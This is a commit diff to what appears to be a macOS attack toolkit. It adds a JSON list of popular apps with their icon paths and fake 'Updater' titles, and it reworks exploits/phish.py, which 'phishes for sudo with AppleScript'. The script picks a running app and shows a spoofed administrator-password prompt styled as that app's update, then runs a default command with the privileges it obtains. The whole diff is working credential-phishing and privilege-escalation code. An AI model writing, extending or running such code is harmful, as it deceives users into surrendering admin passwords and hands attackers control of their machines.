apps json for easy additions

Author: thehappydinoa

apps.json

@@ -0,0 +1,27 @@
+{
+  "p1": {
+    "Firefox.app": ["/Contents/Resources/firefox.icns", "Firefox Update"],
+    "Google Chrome.app": ["/Contents/Resources/app.icns", "Google Chrome Updater"]
+  },
+  "p2": {
+    "Dropbox.app": ["/Contents/Resources/icon.icns", "DropboxMacUpdate"],
+    "CCleaner.app": ["/Contents/Resources/c.icns", "CCleaner Update"],
+    "Spotify.app": ["/Contents/Resources/Icon.icns", "Spotify Updater"],
+    "Alfred 3.app": ["/Contents/Resources/appicon.icns", "Alfred Update"],
+    "The Unarchiver.app": ["/Contents/Resources/unarchiver.icns", "The Unarchiver Update"],
+    "VLC.app": ["/Contents/Resources/VLC.icns", "VLC Update"]
+  },
+  "p3": {
+    "Atom.app": ["/Contents/Resources/atom.icns", "Atom Updater"],
+    "Atom Beta.app": ["/Contents/Resources/atom.icns", "Atom Updater"],
+    "Visual Studio.app": ["/Contents/Resources/VisualStudio.icns", "Visual Studio Update"],
+    "Android Studio.app": ["/Contents/Resources/studio.icns", "Android Studio Update"],
+    "Docker.app": ["/Contents/Resources/Appicon.icns", "Docker Update"],
+    "Xcode.app": ["/Contents/Resources/Xcode.icns", "Xcode Update"]
+  },
+  "p4": {
+    "Safari.app": ["/Contents/Resources/compass.icns", "Safari Update"],
+    "iTunes.app": ["/Contents/Resources/iTunes.icns", "iTunes Update"],
+    "System Preferences.app": ["/Contents/Resources/PrefApp.icns", "System Update"]
+  }
+}

exploits/general.py

@@ -29,10 +29,15 @@ def default_browser():
 
 
 def app_installed(app_name):
-    """check if app installed"""
+    """checks if app installed"""
     return os.path.isdir("/Applications/" + app_name) or os.path.isdir("~/Applications/" + app_name)
 
 
+def app_running(app_name):
+    """checks if app running"""
+    return not os.system("pgrep -f \"{app_name}\" > /dev/null".format(app_name=app_name)) == 256
+
+
 def osascript(command):
     """runs shell for osascript"""
     osa = Popen([command], shell=True, stdout=PIPE)

exploits/phish.py

@@ -1,29 +1,22 @@
 """phishes for sudo with AppleScript"""
+import json
 import os
 import plistlib
 
-from .general import (DEFAULT_COMMAND, app_installed, default_browser,
-                      osascript, random_string)
+from .general import (DEFAULT_COMMAND, app_installed, app_running, osascript,
+                      random_string)
 
 try:
     input = raw_input
 except NameError:
     pass
 
+with open("apps.json") as json_file:
+    APPS = json.load(json_file)
+
 __cve__ = ""
 __credits__ = "thehappydinoa"
 
-BROWSERS = {
-    "com.google.chrome": ("Google Chrome.app", "/Contents/Resources/app.icns", "Google Chrome Updater"),
-    "org.mozilla.firefox": ("Firefox.app", "/Contents/Resources/firefox.icns", "Firefox Updater"),
-    "com.apple.safari": ("Safari.app", "/Contents/Resources/compass.icns", "Safari Update")
-}
-
-APPS = {
-    "Spotify.app": ("/Contents/Resources/Icon.icns", "Spotify Updater"),
-    "Dropbox.app": ("/Contents/Resources/icon.icns", "DropboxMacUpdate")
-}
-
 
 def admin_prompt(app=None, icon_path=None, prompt="System Update", command="echo hello"):
     """prompts with administrator privileges"""
@@ -75,12 +68,9 @@ def vulnerable(version):
 
 def run():
     """runs exploit"""
-    browser = default_browser()
-    if browser and browser in BROWSERS.keys():
-        browser_data = BROWSERS.get(browser)
-        return admin_prompt(app=browser_data[0], icon_path=browser_data[1], prompt=browser_data[2], command=DEFAULT_COMMAND)
-    for app in APPS.keys():
-        if app_installed(app):
-            app_info = APPS.get(app)
-            return admin_prompt(app=app, icon_path=app_info[0], prompt=app_info[1], command=DEFAULT_COMMAND)
+    for priority_level in sorted(APPS.iterkeys()):
+        for app in APPS.get(priority_level).keys():
+            if app_installed(app) and app_running(app):
+                app_info = APPS.get(priority_level).get(app)
+                return admin_prompt(app=app, icon_path=app_info[0], prompt=app_info[1], command=DEFAULT_COMMAND)
     return admin_prompt(app="System Preferences.app", icon_path="/Contents/Resources/PrefApp.icns", prompt="System Update", command=DEFAULT_COMMAND)